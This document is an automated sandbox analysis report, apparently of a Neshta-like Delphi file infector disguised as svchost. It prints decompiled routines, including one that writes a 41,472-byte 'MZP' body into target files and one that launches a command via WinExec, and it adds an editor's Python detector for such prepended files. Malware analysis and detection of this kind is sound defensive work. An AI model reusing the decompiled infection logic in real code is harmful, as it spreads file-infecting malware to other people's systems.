                                                                          • Opcode Fuzzy Hash: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                          • Instruction Fuzzy Hash: 301159725181089EE720BE759C52BAA7FADDF45304F4644F7AA0DB32C3D9384D128A28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 559 4012a0-4012ad 560 4012b6-4012bc 559->560 561 4012af-4012b4 559->561 562 4012c2-4012da VirtualAlloc 560->562 561->562 563 4012dc-4012ea call 401154 562->563 564 4012ff-401302 562->564 563->564 567 4012ec-4012fd VirtualFree 563->567 567->564
                                                                          C-Code - Quality: 100%
                                                                          			E004012A0(void* __eax, void** __edx) {
                                                                          				void* _t3;
                                                                          				void** _t8;
                                                                          				void* _t11;
                                                                          				long _t14;
                                                                          
                                                                          				_t8 = __edx;
                                                                          				if(__eax >= 0x100000) {
                                                                          					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                          				} else {
                                                                          					_t14 = 0x100000;
                                                                          				}
                                                                          				_t8[1] = _t14;
                                                                          				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                          				_t11 = _t3;
                                                                          				 *_t8 = _t11;
                                                                          				if(_t11 != 0) {
                                                                          					_t3 = E00401154(0x40a5d4, _t8);
                                                                          					if(_t3 == 0) {
                                                                          						VirtualFree( *_t8, 0, 0x8000);
                                                                          						 *_t8 = 0;
                                                                          						return 0;
                                                                          					}
                                                                          				}
                                                                          				return _t3;
                                                                          			}

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012CF
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                          • Instruction ID: 90e8f67b1060bd1251f945ff82b9078c1ba764c12e4cd0c6011b14969f372c3f
                                                                          • Opcode Fuzzy Hash: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                          • Instruction Fuzzy Hash: 97F02773B006205BEB206A6A4D81B4369C59F59B90F1400BAFB4CFF3D9DA798C0043A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 52%
                                                                          			// Decompiled routine; the comments are the editor's reading of the code and
                                                                          			// of the API list below, not symbols recovered from the binary.
                                                                          			// Takes a path in __eax, hands it to one of two file routines depending on
                                                                          			// whether its first character is a backslash, repeats that for each
                                                                          			// command-line parameter, then launches a command with WinExec.
                                                                          			E00407D9C(char* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                          				char* _v8;
                                                                          				void* _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				intOrPtr _v24;
                                                                          				int _v28;
                                                                          				void* _t49;
                                                                          				intOrPtr _t56;
                                                                          				void* _t63;
                                                                          				intOrPtr _t66;
                                                                          
                                                                          				_t62 = __esi;
                                                                          				_t61 = __edi;
                                                                          				_t48 = __ebx;
                                                                          				_push(0); // six zeroed temporaries, released by E004030B8(&_v28, 6) on exit
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(__ebx);
                                                                          				_push(__esi);
                                                                          				_v8 = __eax; // the path this routine works on
                                                                          				E004033FC(_v8);
                                                                          				_push(_t66);
                                                                          				_push(0x407e75);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t66; // installs an SEH frame; the Delphi try/finally prologue, consistent with the "MZP" DOS stub written elsewhere in this sample
                                                                          				if( *_v8 != 0x5c) { // 0x5c is '\\': dispatch on the first character of the path
                                                                          					E00407BD4(_v8, __ebx, __esi); // executed; this subcall calls GetFileAttributesA/SetFileAttributesA (see APIs below)
                                                                          				} else {
                                                                          					E004071D0(_v8, __ebx, __edi, __esi); // also calls GetFileAttributesA/SetFileAttributesA
                                                                          				}
                                                                          				_t63 = E00404AE8(_t48, _t61, _t62); // parameter count; E004049D0 below reads parameters and calls GetModuleFileNameA, as Delphi's ParamStr does
                                                                          				if(_t63 > 0) {
                                                                          					_t49 = 1;
                                                                          					do { // same first-character dispatch for parameters 1..count
                                                                          						E004049D0(_t49, _t49,  &_v12, _t61, _t63);
                                                                          						if( *_v12 != 0x5c) {
                                                                          							E004049D0(_t49, _t49,  &_v20, _t61, _t63);
                                                                          							E00407BD4(_v20, _t49, _t63); // executed
                                                                          						} else {
                                                                          							E004049D0(_t49, _t49,  &_v16, _t61, _t63);
                                                                          							E004071D0(_v16, _t49, _t61, _t63);
                                                                          						}
                                                                          						_t49 = _t49 + 1;
                                                                          						_t63 = _t63 - 1;
                                                                          					} while (_t63 != 0);
                                                                          				}
                                                                          				_push(1);
                                                                          				_push(_v8);
                                                                          				_push(E00407E8C); // string at 0x407E8C; its contents are not shown in this listing
                                                                          				E00406F34(0, _t48,  &_v28, _t61, _t63);
                                                                          				E004032CC();
                                                                          				WinExec(E0040340C(_v24), _v28); // executed: E0040340C(_v24) is the command line, _v28 the uCmdShow flag
                                                                          				_pop(_t56);
                                                                          				 *[fs:eax] = _t56; // restore the previous SEH frame
                                                                          				_push(E00407E7C);
                                                                          				return E004030B8( &_v28, 6);
                                                                          			}













                                                                          Instruction addresses: 0x00407d9c to 0x00407e74 (listing column only; the disassembly text was not extracted)

                                                                          APIs
                                                                          • WinExec.KERNEL32 ref: 00407E55
                                                                            • Part of subcall function 004071D0: GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                            • Part of subcall function 004071D0: SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                            • Part of subcall function 00407BD4: GetFileAttributesA.KERNEL32(00000000,00000000,00407D8D), ref: 00407C7C
                                                                            • Part of subcall function 00407BD4: SetFileAttributesA.KERNEL32(00000000,00000000), ref: 00407C90
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Attributes$ExecModuleName
                                                                          • String ID:
                                                                          • API String ID: 1864538708-0
                                                                          • Opcode ID: 2dd2dee9ac6b51d1a558883945a056b3e2b38872fad6aa3749e99bffffc21bfb
                                                                          • Instruction ID: 40707d73a39ba7ecc7968a88c6b1cf4d961407a3323fd5b51122ef1c80257f0a
                                                                          • Opcode Fuzzy Hash: 2dd2dee9ac6b51d1a558883945a056b3e2b38872fad6aa3749e99bffffc21bfb
                                                                          • Instruction Fuzzy Hash: C5216570E04209AFDB01EBA5CC82AAF77B8EF44304F5044BBB500B72D1D67CAE05979A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 70%
                                                                          			// Decompiled routine; comments are the editor's reading of the API list below.
                                                                          			// Opens a file (E00404B68 wraps CreateFileA), writes a buffer to it
                                                                          			// (E00404BE0 wraps WriteFile), cuts the file off at the write position with
                                                                          			// SetEndOfFile and closes it (E00404B90 wraps CloseHandle).
                                                                          			E00405E50(void* __eax, void* __ecx, void* __edx) {
                                                                          				void* _t8;
                                                                          				void* _t11;
                                                                          				void* _t13;
                                                                          				long _t14;
                                                                          				void* _t21;
                                                                          				void* _t23;
                                                                          				void* _t32;
                                                                          				void* _t33;
                                                                          
                                                                          				_push(__eax);
                                                                          				_t8 = E00404B68(__edx, 0x40000400) + 1; // handle + 1: zero exactly when CreateFileA returned INVALID_HANDLE_VALUE (-1)
                                                                          				if(_t8 != 0) {
                                                                          					_t23 = _t8 - 1; // the open file handle
                                                                          					_pop(_t11);
                                                                          					E00405D30(_t11, _t33);
                                                                          					_t13 = 0;
                                                                          					_t14 = E0040320C(_t13); // byte count for the write
                                                                          					_t32 = _t13;
                                                                          					_push(_t32);
                                                                          					E00404BE0(_t23, _t14, _t32); // WriteFile(handle, ...)
                                                                          					SetEndOfFile(_t23); // executed: truncates at the current file position, discarding any tail that was there before
                                                                          					E00404B90(_t23); // CloseHandle(handle)
                                                                          					_t21 = E004044A8();
                                                                          					_push(_t32);
                                                                          					_t8 = _t21 + 1;
                                                                          				}
                                                                          				return _t8; // 0 when the open failed
                                                                          			}











                                                                          Instruction addresses: 0x00405e51 to 0x00405e92 (listing column only; the disassembly text was not extracted)

                                                                          APIs
                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                          • SetEndOfFile.KERNEL32(?,00000000,?,00407FE8,00000000,00407FFE,?,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000), ref: 00405E7E
                                                                            • Part of subcall function 00404B90: CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleWrite
                                                                          • String ID:
                                                                          • API String ID: 1065093856-0
                                                                          • Opcode ID: 8c09bd4d963a50a7faf13c3890e17a4b6a86585bbbe459f83c5b676390fd9176
                                                                          • Instruction ID: 282573299c96567a49cd7015b4ad24297c06c8278f95cf55d9cf1746db26bc01
                                                                          • Opcode Fuzzy Hash: 8c09bd4d963a50a7faf13c3890e17a4b6a86585bbbe459f83c5b676390fd9176
                                                                          • Instruction Fuzzy Hash: 58E092E1289A611DE202B6662CA7B2E6119CAC021DF61983FB605EB1C3C93DD80600AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
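
The WriteFile subcall in the API list above writes a 0xA200 (41,472) byte buffer that begins with "MZP", the DOS-stub signature of Delphi-built executables, and this routine then truncates and closes the target. The following Python helper is added by the editor and is not part of the Joe Sandbox report or of the sample: it checks a file for the layout those calls imply, a Delphi-style "MZP" header at offset 0 followed by a second PE header at offset 0xA200, and carves out what follows. The 0xA200 body length is taken from the listing; that the original host begins immediately after the prepended body is an assumption (it matches public descriptions of Neshta, but the report does not state it). The sample bytes are constructed, not taken from the sample.

```python
import struct
from typing import Optional

# Length of the buffer passed to WriteFile in the listing above (0xA200 = 41472 bytes).
NESHTA_BODY_LEN = 0xA200
# DOS-stub signature of Delphi-built executables, first bytes of the same buffer.
DELPHI_STUB_MAGIC = b"MZP"


def _pe_header_offset(blob: bytes, base: int) -> Optional[int]:
    """Return the absolute offset of 'PE\\0\\0' for a DOS header at `base`, or None.

    Bounds are checked before every read so a truncated file never raises.
    """
    if len(blob) < base + 0x40 or blob[base:base + 2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, base + 0x3C)[0]
    pe_off = base + e_lfanew
    if pe_off + 4 > len(blob) or blob[pe_off:pe_off + 4] != b"PE\0\0":
        return None
    return pe_off


def looks_prepended(blob: bytes) -> bool:
    """True when `blob` has a Delphi 'MZP' PE at offset 0 and another valid PE at 0xA200.

    Assumption (not stated by the report): the host executable starts right after
    the 0xA200-byte body, so a second DOS/PE header pair must be found there.
    """
    if blob[:3] != DELPHI_STUB_MAGIC:
        return False
    if _pe_header_offset(blob, 0) is None:
        return False
    return _pe_header_offset(blob, NESHTA_BODY_LEN) is not None


def carve_host(blob: bytes) -> Optional[bytes]:
    """Return the bytes after the prepended body, or None if the layout does not match."""
    return blob[NESHTA_BODY_LEN:] if looks_prepended(blob) else None


def make_minimal_pe(stub_magic: bytes, total_len: int) -> bytes:
    """Constructed test data: a DOS header whose e_lfanew points at 'PE\\0\\0' at 0x80."""
    hdr = bytearray(total_len)
    hdr[0:len(stub_magic)] = stub_magic
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    hdr[0x80:0x84] = b"PE\0\0"
    return bytes(hdr)


# Constructed samples: a 0xA200-byte Delphi-style body followed by a 0x200-byte host,
# and a plain host with no prepended body.
INFECTED = make_minimal_pe(b"MZP", NESHTA_BODY_LEN) + make_minimal_pe(b"MZ\x90", 0x200)
CLEAN = make_minimal_pe(b"MZ\x90", 0x400)

if __name__ == "__main__":
    print("constructed infected sample:", looks_prepended(INFECTED))
    print("constructed clean sample:", looks_prepended(CLEAN))
```

The check deliberately requires a parseable PE header at both offsets rather than only the "MZP" prefix: legitimate Delphi programs also start with "MZP", so the prefix alone would flag every Delphi executable on a host.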

                                                                          C-Code - Quality: 100%
                                                                          			// Decompiled routine; comments are the editor's reading. Copies the string in
                                                                          			// __eax into *__edx and lower-cases the copy in place with CharLowerBuffA
                                                                          			// (the shape of a Delphi AnsiLowerCase-style helper).
                                                                          			E00404808(void* __eax, CHAR** __edx) {
                                                                          				void* _t7;
                                                                          				long _t9;
                                                                          				long _t10;
                                                                          				CHAR** _t14;
                                                                          				void* _t15;
                                                                          
                                                                          				_t14 = __edx;
                                                                          				_t15 = __eax;
                                                                          				_t10 = E0040320C(__eax); // string length, reused below as CharLowerBuffA's character count
                                                                          				_t7 = E00403184(__edx, _t10, E0040340C(_t15)); // copy the source characters into *__edx
                                                                          				if(_t10 > 0) {
                                                                          					_t9 = CharLowerBuffA( *_t14, _t10); // executed: in-place lower-casing of the copy
                                                                          					return _t9;
                                                                          				}
                                                                          				return _t7; // empty input: nothing to lower-case
                                                                          			}








                                                                          Instruction addresses: 0x0040480b to 0x0040483a (listing column only; the disassembly text was not extracted)

                                                                          APIs
                                                                          • CharLowerBuffA.USER32(00000000,00000000,?,?,?,004048BE,00000000,00000000,?,0040558D,00000000,00405611,?,00000000,?,00000000), ref: 00404832
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: BuffCharLower
                                                                          • String ID:
                                                                          • API String ID: 2358735015-0
                                                                          • Opcode ID: 77ff168e13d2d29f1b12420b26d373017b2423865bfbd764805228717caed2c8
                                                                          • Instruction ID: c09f9eebdd676df2f73b89bb3c73fd995db2893554e7900a9a0ed4ebbaba9e65
                                                                          • Opcode Fuzzy Hash: 77ff168e13d2d29f1b12420b26d373017b2423865bfbd764805228717caed2c8
                                                                          • Instruction Fuzzy Hash: 74D017A2300124178200BAAF08C595A9ACD4ED82A6314443FB618EB383EE78CD06026C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			// Decompiled routine; comments are the editor's reading of the API list below.
                                                                          			// Extracts icon number __ecx from the file named by __edx and, when ExtractIconA
                                                                          			// returns a real icon handle, passes it to E00406520, which inspects it with
                                                                          			// GetIconInfo/GetObjectA and frees the bitmaps with DeleteObject.
                                                                          			E00406CA8(void* __eax, int __ecx, void* __edx) {
                                                                          				char* _t6;
                                                                          				void* _t7;
                                                                          				void* _t8;
                                                                          				void* _t11;
                                                                          				int _t16;
                                                                          
                                                                          				_t16 = __ecx; // icon index
                                                                          				_t11 = __eax;
                                                                          				E004064E4(__eax); // releases a previously held handle (subcall uses DestroyCursor)
                                                                          				_t6 = E0040340C(__edx); // file name as a C string
                                                                          				_t7 =  *0x40a650; // 0x400000: this module's image base, used as the hInst argument
                                                                          				_t8 = ExtractIconA(_t7, _t6, _t16); // executed
                                                                          				if(_t8 > 1) { // ExtractIcon returns NULL (no icons) or 1 (not an executable/DLL/icon file); anything larger is an HICON
                                                                          					return E00406520(_t11, _t8);
                                                                          				}
                                                                          				return _t8;
                                                                          			}








                                                                          Instruction addresses: 0x00406cab to 0x00406cdc (listing column only; the disassembly text was not extracted)

                                                                          APIs
                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000000), ref: 00406CC7
                                                                            • Part of subcall function 00406520: GetIconInfo.USER32(?), ref: 00406540
                                                                            • Part of subcall function 00406520: GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406566
                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406574
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$DeleteIcon$CursorDestroyExtractInfo
                                                                          • String ID:
                                                                          • API String ID: 2619871307-0
                                                                          • Opcode ID: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                          • Instruction ID: 3dd68c7f1dd4f5608f9b9662a0ba171f3b5b53225b24c93893625578eb0e5390
                                                                          • Opcode Fuzzy Hash: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                          • Instruction Fuzzy Hash: 32D05E767002202BC321B6BF2CC181B8ADDCACA269316453FB109F7293C97DCC12126D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404F34(void* __eax, void* __edx) {
                                                                          				char _v268;
                                                                          				long _t6;
                                                                          				void* _t13;
                                                                          				void* _t14;
                                                                          
                                                                          				_t13 = __edx;
                                                                          				_t6 = GetShortPathNameA(E0040340C(__eax),  &_v268, 0x104); // executed
                                                                          				return E00403184(_t13, _t6, _t14);
                                                                          			}

                                                                          APIs
                                                                          • GetShortPathNameA.KERNEL32(00000000,?,00000104), ref: 00404F52
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: NamePathShort
                                                                          • String ID:
                                                                          • API String ID: 1295925010-0
                                                                          • Opcode ID: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                          • Instruction ID: 14e814bc68ad69d6c3dbd45ca29a6777f0e45ac5a2bbd03733d3eefc14da3dab
                                                                          • Opcode Fuzzy Hash: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                          • Instruction Fuzzy Hash: C9D05EE1B0021027D200B66D1CC2A9BA6CC4B88729F14413A7758EB2D2E9798E1402D9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 66%
                                                                          			E00404B68(CHAR* __eax, unsigned int __edx) {
                                                                          				CHAR* _t1;
                                                                          				void* _t2;
                                                                          				long _t6;
                                                                          				long _t9;
                                                                          
                                                                          				_t9 = __edx;
                                                                          				_t1 = __eax;
                                                                          				_push(0);
                                                                          				_t6 = __edx >> 0x00000010 & 0x00001fff;
                                                                          				if(_t6 == 0) {
                                                                          					_t6 = 0x80;
                                                                          				}
                                                                          				_t2 = CreateFileA(_t1, 0, _t9, 0, _t9, _t6, ??); // executed
                                                                          				return _t2;
                                                                          			}

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                          • Instruction ID: ecc9e2cd6cddaadd7fb33e9927afed1fcbe410aa9616ae81c498ff4a473f225f
                                                                          • Opcode Fuzzy Hash: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                          • Instruction Fuzzy Hash: F9C012E15641113EFA0C22587C37FBB128D83D4714C90962EB206A77D1C458280041AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E00404018(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;
				CHAR* _t4; // declaration missing in the decompiler output; holds the name argument

				_t4 = _a12;
                                                                          				asm("sbb eax, eax");
                                                                          				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                                          				return _t8;
                                                                          			}

                                                                          APIs
                                                                          • CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateMutex
                                                                          • String ID:
                                                                          • API String ID: 1964310414-0
                                                                          • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                          • Instruction ID: 31d529539147b31f913da60fb79b32c9d72b995d2910e43382fd7a33128a04fb
                                                                          • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                          • Instruction Fuzzy Hash: 8AC01273150248ABC700EEA9DC05D9B33DC5758609B008825B618D7100C139E5909B64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404B9C() {
                                                                          				void* _t3;
                                                                          				long _t5;
                                                                          				void* _t6;
                                                                          				void* _t10;
                                                                          
                                                                          				_t5 = GetFileAttributesA(E00404490(_t3)); // executed
                                                                          				_t6 = _t5 + 1;
                                                                          				_t10 = _t6;
                                                                          				if(_t10 != 0) {
                                                                          					return _t6 - 0x00000001 & 0 | _t10 == 0x00000000;
                                                                          				}
                                                                          				return _t6;
                                                                          			}

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: f0e2935d6735992bbc1d1517f7f0ae46d2a9bb3647fd1b02a3c043829b286a3b
                                                                          • Instruction ID: b116303671e024f583cda4c1147e2dbfbac77b887c659148fe5224e5fd1b100a
                                                                          • Opcode Fuzzy Hash: f0e2935d6735992bbc1d1517f7f0ae46d2a9bb3647fd1b02a3c043829b286a3b
                                                                          • Instruction Fuzzy Hash: 65A012C682120114CC1071F1220375A0144E4C02CC38448A62350B00C2C83CE501001D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404BB4(void* __eax, signed int __ecx, long __edx) {
                                                                          				long _t2;
                                                                          
                                                                          				_t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
                                                                          				return _t2;
                                                                          			}

                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                          • Instruction ID: 68b303876a78b47fa373b2f01407b4ce5b79aa50a67d4c8f5d0a49418ed6adba
                                                                          • Opcode Fuzzy Hash: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                          • Instruction Fuzzy Hash: 69A002D85902203AF8182363AC5FF37105C97C0B55FD0855E7351754C164EC6A241039
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0040137C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
                                                                          				intOrPtr _v20;
                                                                          				intOrPtr _v24;
                                                                          				void* _v28;
                                                                          				intOrPtr* _v32;
                                                                          				intOrPtr* _t24;
                                                                          				intOrPtr _t27;
                                                                          				intOrPtr _t31;
                                                                          				int _t32;
                                                                          				intOrPtr* _t35;
                                                                          				intOrPtr* _t42;
                                                                          				void* _t43;
                                                                          				void* _t44;
                                                                          				intOrPtr* _t45;
                                                                          
                                                                          				_t45 =  &_v20;
                                                                          				_v32 = __ecx;
                                                                          				 *_t45 = __edx;
                                                                          				_v28 = 0xffffffff;
                                                                          				_v24 = 0;
                                                                          				_t44 = __eax;
                                                                          				_v20 =  *_t45 + __eax;
                                                                          				_t35 =  *0x40a5d4; // 0x571f74
                                                                          				while(_t35 != 0x40a5d4) {
                                                                          					_t42 =  *_t35;
                                                                          					_t43 =  *(_t35 + 8);
                                                                          					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
                                                                          						if(_t43 < _v28) {
                                                                          							_v28 = _t43;
                                                                          						}
                                                                          						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
                                                                          						if(_t31 > _v24) {
                                                                          							_v24 = _t31;
                                                                          						}
                                                                          						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
                                                                          						if(_t32 == 0) {
